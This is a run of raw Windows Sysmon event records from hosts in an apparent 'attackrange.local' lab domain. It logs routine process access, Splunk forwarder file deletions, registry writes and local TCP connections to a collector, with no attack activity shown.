19:19:20.489{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095486Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:20.489{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095485Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:20.414{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-7AB8-6080-A15F-00000000BA01}6536C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095484Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:20.412{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095483Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:20.412{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095482Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:20.412{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095481Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:20.411{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095480Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:20.411{761B69BB-818A-607D-0500-00000000BA01}4083000C:\Windows\system32\csrss.exe{761B69BB-7AB8-6080-A15F-00000000BA01}6536C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001095479Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:20.411{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-7AB8-6080-A15F-00000000BA01}6536C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001095478Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:20.410{761B69BB-7AB8-6080-A15F-00000000BA01}6536C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001095477Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:20.213{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC8AC8C3A4B285DB945F5D9732C684C7,SHA256=D12D68BA2CA0E907C5F42664D5F08FDDC170B0830A34742582F046C6318FB187,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095476Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:20.164{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=755C6D719A450CF4F31DA3AFCB67C8F0,SHA256=6D15FD6302EFBA20A8B30A02824255BA0ED2CCA5B26E3A53649A6B61870A37F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095475Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:20.164{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3A1349F911FEEB31B6087382AC59EAF3,SHA256=7EACEFD64D54152DBF4AA37A2352A3AD74E55BF13604D7281D8CE66D67C4C3CF,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001607065Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:21.582{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001607064Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:21.582{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFCDFFB47238773F072531787FA9A2C0,SHA256=970BCDCBFE3D70E546DAF892FF3CC72F4BB3D049D36D47686EAE0065FA8C7391falsefalse - insufficient disk space 13241300x80000000000000001607063Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:21.566{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\33\Shell\SniffedFolderTypeGeneric 13241300x80000000000000001607062Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:21.566{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\33\Shell\SniffedFolderTypeDocuments 10341000x80000000000000001095493Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:21.490{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095492Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:21.490{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095491Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:21.425{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=755C6D719A450CF4F31DA3AFCB67C8F0,SHA256=6D15FD6302EFBA20A8B30A02824255BA0ED2CCA5B26E3A53649A6B61870A37F9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001095490Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:15.754{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1169-false10.0.1.12-8000- 23542300x80000000000000001095489Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:21.223{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E362519883B2964423F5C05E8F992224,SHA256=4A1A2902B0C5A56DB66947A1A004ED963A78C9054632BEB35E030CDDE93C28D8,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001607067Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:22.569{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001607066Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:22.569{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3B40F47F91F273EA43B4A30AADD5A0F,SHA256=B8ED6124B2C41C57F0BBDCB5F074CEEF856984982424E56D9BE5C28E7AC3EDBEfalsefalse - insufficient disk space 10341000x80000000000000001095496Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:22.490{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095495Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:22.490{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095494Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:22.230{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F817D8761CFB1589C3F39EC88E18F1FC,SHA256=02E7E1F9DB50696AAF3C02543DA12CF4BAE1C886FA69B5CBF2324D71330D982D,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001607072Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:23.622{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001607071Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:23.622{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B936D3C0150188865CB575A0F537E59,SHA256=D7606B2E4B94D6B9929D814F3E7F6E62C5935F60B3035771A235046163B7A7C8falsefalse - insufficient disk space 10341000x80000000000000001095499Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:23.491{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095498Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:23.491{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095497Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:23.237{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC86D828BA7AD33B1FE109627A8813AA,SHA256=CDED20C189C9272C2E664D97E806DF1D838AAD2B748AA6B0DF945013E711AD8D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001607070Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:21.687{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49745-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001607069Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:23.139{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001607068Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:23.139{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=637D5628B3703812710CD4EB4DF4DD1D,SHA256=638620C751E3E743FC656736A3356F75D76F456E35C918E796D57EC0EAE6D18Efalsefalse - insufficient disk space 11241100x80000000000000001607075Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:24.790{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001607074Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:24.790{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=466DFF4BC54F1CFA5B5FD5DAF402CE17,SHA256=FB15CBFFF947DB64FEF06BAE42D2EE901936AEEAE0B49BA61CA361524555C819falsefalse - insufficient disk space 10341000x80000000000000001095503Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:24.491{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095502Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:24.491{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095501Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:24.426{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B070326ADD2CA78D403F503FC413C79D,SHA256=7E31E672B8EDD45D157B2B894A81EDDECF53E577C476182B63A9D2B218EA420F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095500Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:24.242{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4809376698F0A10C4047C34955839D55,SHA256=19653D3DE85AF7C7251518A0635E1F7F47F95CDF7EAC436CF84F5C1B41F06154,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001607073Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 19:19:24.188{21761711-83AE-607D-1000-00000000BB01}960C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d736e3-0x3d22debf) 11241100x80000000000000001607081Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:25.827{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001607080Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:25.826{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 